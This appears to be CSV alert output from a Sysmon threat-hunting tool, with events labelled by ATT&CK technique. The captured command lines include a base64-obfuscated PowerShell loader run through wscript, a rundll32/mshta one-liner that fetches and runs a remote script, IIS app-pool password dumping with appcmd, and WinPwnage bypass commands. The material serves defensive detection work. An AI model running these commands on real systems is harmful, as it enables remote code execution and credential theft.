[ T1059 ] wscript or cscript running script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))""") and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
10662
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-14 11:53:29.768
747F3D96-F639-5D53-0000-0010B0FC2600
8180
C:\Windows\System32\wscript.exe
5.812.10240.16384
Microsoft ® Windows Based Script Host
Microsoft ® Windows Script Host
Microsoft Corporation
"c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-F419-5D53-0000-002026910200
0x29126
1
Medium
SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C
747F3D96-F639-5D53-0000-001092EE2600
6000
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.822932,2019-05-27T05:29:18.822932+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:vdir.name ),1,"
1
5
4
1
0
0x8000000000000000
5937
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:18.782
365ABB72-3D6E-5CEB-0000-00106FA6FF00
1876
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:vdir.name
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557667978.167195,2019-05-12T17:32:58.167195+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
16389
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:30:46.275
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-2006-5CD8-0000-0010A2862300
2960
C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1,"
1
5
4
1
0
0x8000000000000000
6180
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:47.402
365ABB72-FE6F-5CEB-0000-0010F4370C00
3448
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-FD85-5CEB-0000-00104C0E0B00
1944
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1,"
1
5
4
1
0
0x8000000000000000
6180
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:47.402
365ABB72-FE6F-5CEB-0000-0010F4370C00
3448
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-FD85-5CEB-0000-00104C0E0B00
1944
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1558452779.769825,2019-05-21T19:32:59.769825+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( gator4243.hostgator.com ) , IP ( 108.179.232.58 ) and port ( 443 )",3,"
3
5
4
3
0
0x8000000000000000
4128
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 06:58:39.888
365ABB72-1A29-5CE4-0000-001079F92101
2432
C:\Windows\System32\mshta.exe
IEWIN7\IEUser
tcp
true
false
10.0.2.15
IEWIN7..home
49703
false
108.179.232.58
gator4243.hostgator.com
443
https
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556664747.588976,2019-05-01T02:52:27.588976+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1,"
1
5
4
1
0
0x8000000000000000
10153
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 22:49:09.276
365ABB72-D0E5-5CC8-0000-0010DADF3E00
2892
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-C494-5CC8-0000-0020E4FF0000
0xffe4
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-D0E4-5CC8-0000-00103CB73E00
3680
C:\Windows\Installer\MSI4FFD.tmp
"C:\Windows\Installer\MSI4FFD.tmp"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.742817,2019-05-27T05:29:18.742817+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.password ),1,"
1
5
4
1
0
0x8000000000000000
5934
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:18.702
365ABB72-3D6E-5CEB-0000-0010AFA2FF00
3812
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url)",1,"
1
5
4
1
0
0x8000000000000000
16388
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:30:46.213
365ABB72-2006-5CD8-0000-0010A2862300
2960
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-1FF8-5CD8-0000-00102A342000
1332
C:\Python27\python.exe
python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1,"
1
5
4
1
0
0x8000000000000000
16388
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:30:46.213
365ABB72-2006-5CD8-0000-0010A2862300
2960
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-1FF8-5CD8-0000-00102A342000
1332
C:\Python27\python.exe
python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1,"
1
5
4
1
0
0x8000000000000000
16388
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:30:46.213
365ABB72-2006-5CD8-0000-0010A2862300
2960
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-1FF8-5CD8-0000-00102A342000
1332
C:\Python27\python.exe
python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1,"
1
5
4
1
0
0x8000000000000000
4127
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 15:32:57.837
365ABB72-1A29-5CE4-0000-001079F92101
2432
C:\Windows\System32\mshta.exe
11.00.9600.16428 (winblue_gdr.131013-1700)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
"C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-39CC-5CE3-0000-002096C70000
0xc796
1
High
SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
365ABB72-1A29-5CE4-0000-00107BE42101
2920
C:\Windows\System32\rundll32.exe
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt ) contains suspicious command ( \mshta.exe),1,"
1
5
4
1
0
0x8000000000000000
4127
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 15:32:57.837
365ABB72-1A29-5CE4-0000-001079F92101
2432
C:\Windows\System32\mshta.exe
11.00.9600.16428 (winblue_gdr.131013-1700)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
"C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-39CC-5CE3-0000-002096C70000
0xc796
1
High
SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
365ABB72-1A29-5CE4-0000-00107BE42101
2920
C:\Windows\System32\rundll32.exe
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1,"
1
5
4
1
0
0x8000000000000000
4127
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 15:32:57.837
365ABB72-1A29-5CE4-0000-001079F92101
2432
C:\Windows\System32\mshta.exe
11.00.9600.16428 (winblue_gdr.131013-1700)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
"C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-39CC-5CE3-0000-002096C70000
0xc796
1
High
SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
365ABB72-1A29-5CE4-0000-00107BE42101
2920
C:\Windows\System32\rundll32.exe
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url)",1,"
1
5
4
1
0
0x8000000000000000
16438
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:56:12.485
365ABB72-25FC-5CD8-0000-0010906A1300
2168
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url
C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-2523-5CD8-0000-00204C360100
0x1364c
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-25EC-5CD8-0000-0010CB0A1000
684
C:\Python27\python.exe
python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript running script,1634833622.319552,2021-10-21T20:27:02.319552+04:00,,Threat,High,"Found User (LAPTOP-JU4M3I0E\bouss) Trying to run wscript or cscript with Command Line (cscript.exe //e:jscript testme.js) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\System32\cmd.exe") in directory : ( C:\Users\bouss\Desktop\ )",1,"
1
5
4
1
0
0x8000000000000000
10920364
Microsoft-Windows-Sysmon/Operational
LAPTOP-JU4M3I0E
2021-10-21 16:27:02.278
00247C92-94D6-6171-0000-00100514967B
28176
C:\Windows\System32\cscript.exe
5.812.10240.16384
Microsoft ® Console Based Script Host
Microsoft ® Windows Script Host
Microsoft Corporation
cscript.exe
cscript.exe //e:jscript testme.js
C:\Users\bouss\Desktop\
LAPTOP-JU4M3I0E\bouss
00247C92-3C1A-6169-0000-0020C2790700
0x779c2
1
Medium
SHA1=C3D511D4CF77C50D00A5264C6BB3AE44E5008831,MD5=B8454647EFC71192BF7B1572D18F7BD8,SHA256=C69648B049E35FF96523C911737A0481D52DD06508A561094A4FA895A30A6535,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
00247C92-85C9-6170-0000-001008E62B6B
24148
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1,"
1
5
4
1
0
0x8000000000000000
16438
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:56:12.485
365ABB72-25FC-5CD8-0000-0010906A1300
2168
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url
C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-2523-5CD8-0000-00204C360100
0x1364c
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-25EC-5CD8-0000-0010CB0A1000
684
C:\Python27\python.exe
python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.662701,2019-05-27T05:29:18.662701+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.username ),1,"
1
5
4
1
0
0x8000000000000000
5931
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:18.622
365ABB72-3D6E-5CEB-0000-0010EF9EFF00
3756
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.username
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1,"
1
5
4
1
0
0x8000000000000000
16438
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:56:12.485
365ABB72-25FC-5CD8-0000-0010906A1300
2168
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url
C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-2523-5CD8-0000-00204C360100
0x1364c
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-25EC-5CD8-0000-0010CB0A1000
684
C:\Python27\python.exe
python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222)",1,"
1
5
4
1
0
0x8000000000000000
424175
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:58:21.693
747F3D96-51FD-5F93-0000-00103B425E00
7504
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002019A60800
0x8a619
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-51F9-5F93-0000-0010551E5E00
9116
C:\Windows\SysWOW64\rundll32.exe
